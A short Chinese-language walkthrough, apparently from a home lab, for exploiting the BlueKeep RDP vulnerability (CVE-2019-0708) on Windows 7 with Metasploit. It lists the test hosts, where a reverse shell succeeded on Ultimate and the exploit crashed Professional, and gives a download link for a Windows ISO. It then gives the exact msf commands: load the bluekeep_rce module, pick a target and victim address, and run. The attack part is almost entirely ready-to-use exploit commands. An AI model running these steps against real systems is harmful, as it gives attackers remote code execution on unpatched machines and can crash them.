前提条件
1、反弹shell:Windows 7 Utimate(成功)
2、 蓝屏:Windows 7 Professional(蓝屏)
3、Windows7 SP1下载链接:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/
漏洞利用
1、搜索cve-2019-0708
search cve-2019-0708
2、利用cve_2019_0708_bluekeep_rce模块。
2.1、更新msf
如果跟新不成功了话,换下源
apt-get install metasploit-framework
gem install bundler
重新打开msf
3、漏洞利用
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show targets # 选择目标主机类型 这里我选择了Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
set target 4
set rhost 192.168.160.129 # 这里设置受害机
run